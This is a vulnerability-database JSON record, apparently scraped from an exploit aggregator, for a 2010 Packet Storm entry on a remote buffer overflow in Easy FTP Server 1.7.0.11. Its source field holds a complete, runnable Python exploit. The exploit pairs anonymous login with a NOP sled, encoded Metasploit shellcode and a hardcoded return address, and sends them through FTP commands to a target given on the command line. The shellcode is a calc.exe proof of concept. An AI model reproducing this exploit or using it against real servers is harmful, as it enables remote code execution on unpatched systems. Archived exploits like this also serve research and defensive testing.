DATABASE RESOURCES PRICING ABOUT US

{"id": "PACKETSTORM:92662", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Easy FTP 1.7.0.11 Buffer Overflow", "description": "", "published": "2010-08-12T00:00:00", "modified": "2010-08-12T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/92662/Easy-FTP-1.7.0.11-Buffer-Overflow.html", "reporter": "Rabih Mohsen", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2016-11-03T10:27:24", "viewCount": 18, "enchantments": {"score": {"value": 0.9, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.9}, "_state": {"dependencies": 1678912101, "score": 1678911848, "epss": 1678924918}, "_internal": {"score_hash": "8f9a28cda8863720d11666cfd6401cd9"}, "sourceHref": "https://packetstormsecurity.com/files/download/92662/easyftpnlst-overflow.txt", "sourceData": "`# Exploit Title: Easy FTP Server v1.7.0.11 NLST , NLST -al, APPE, RETR , SIZE and XCWD Commands Remote Buffer Overflow Exploit \n# Date: 10/8/2010 \n# Author: Rabih Mohsen \n# Software Link:http://code.google.com/p/easyftpsvr/downloads/detail?name=easyftp-server-1.7.0.11-cn.zip \n# Version: 1.7.0.11 \n# Tested on: Windows XP SP3 \n# CVE: \n \nimport socket \nimport sys \n \nbuffersize = 272 \n \n# Buffer needed -> 272 bytes \n# Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars \\x00\\x0a\\x2f\\x5c ] \n \nshellcode = (\"\\xda\\xc0\\xd9\\x74\\x24\\xf4\\xbb\\xe6\\x9a\\xc9\\x6d\\x5a\\x33\\xc9\\xb1\" \n\"\\x33\\x31\\x5a\\x18\\x83\\xea\\xfc\\x03\\x5a\\xf2\\x78\\x3c\\x91\\x12\\xf5\" \n\"\\xbf\\x6a\\xe2\\x66\\x49\\x8f\\xd3\\xb4\\x2d\\xdb\\x41\\x09\\x25\\x89\\x69\" \n\"\\xe2\\x6b\\x3a\\xfa\\x86\\xa3\\x4d\\x4b\\x2c\\x92\\x60\\x4c\\x80\\x1a\\x2e\" \n\"\\x8e\\x82\\xe6\\x2d\\xc2\\x64\\xd6\\xfd\\x17\\x64\\x1f\\xe3\\xd7\\x34\\xc8\" \n\"\\x6f\\x45\\xa9\\x7d\\x2d\\x55\\xc8\\x51\\x39\\xe5\\xb2\\xd4\\xfe\\x91\\x08\" \n\"\\xd6\\x2e\\x09\\x06\\x90\\xd6\\x22\\x40\\x01\\xe6\\xe7\\x92\\x7d\\xa1\\x8c\" \n\"\\x61\\xf5\\x30\\x44\\xb8\\xf6\\x02\\xa8\\x17\\xc9\\xaa\\x25\\x69\\x0d\\x0c\" \n\"\\xd5\\x1c\\x65\\x6e\\x68\\x27\\xbe\\x0c\\xb6\\xa2\\x23\\xb6\\x3d\\x14\\x80\" \n\"\\x46\\x92\\xc3\\x43\\x44\\x5f\\x87\\x0c\\x49\\x5e\\x44\\x27\\x75\\xeb\\x6b\" \n\"\\xe8\\xff\\xaf\\x4f\\x2c\\x5b\\x74\\xf1\\x75\\x01\\xdb\\x0e\\x65\\xed\\x84\" \n\"\\xaa\\xed\\x1c\\xd1\\xcd\\xaf\\x4a\\x24\\x5f\\xca\\x32\\x26\\x5f\\xd5\\x14\" \n\"\\x4e\\x6e\\x5e\\xfb\\x09\\x6f\\xb5\\xbf\\xe5\\x25\\x94\\x96\\x6d\\xe0\\x4c\" \n\"\\xab\\xf0\\x13\\xbb\\xe8\\x0c\\x90\\x4e\\x91\\xeb\\x88\\x3a\\x94\\xb0\\x0e\" \n\"\\xd6\\xe4\\xa9\\xfa\\xd8\\x5b\\xca\\x2e\\xbb\\x3a\\x58\\xb2\\x12\\xd8\\xd8\" \n\"\\x51\\x6b\\x28\") \n \neip = \"\\x91\\xC8\\x41\\x7E\" # CALL EDI - user32.dll \nnopsled = \"\\x90\" * 16 \n \npayload = \"\\x90\" * (buffersize-(len(nopsled)+len(shellcode))) \n \n# target, CMDS: anny of the \"NLST , NLST -al, APPE, RETR , SIZE and XCWD\" \ndef GenericEasyFTPExploit(target, CMDS): \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nconnect = s.connect((target, 21)) \ns.recv(1024) \ns.send('User anonymous\\r\\n') \ns.recv(1024) \ns.send('PASS anonymous\\r\\n') \ns.send(CMDS +\" \" + nopsled+shellcode+payload+eip+'\\r\\n') \ns.recv(1024) \ns.send('QUIT EASY ftp\\r\\n') \ns.close() \n \ntarget = sys.argv[1] \nCMDS = sys.argv[2] \n \nGenericEasyFTPExploit(target,CMDS) \n \n`\n"}

{}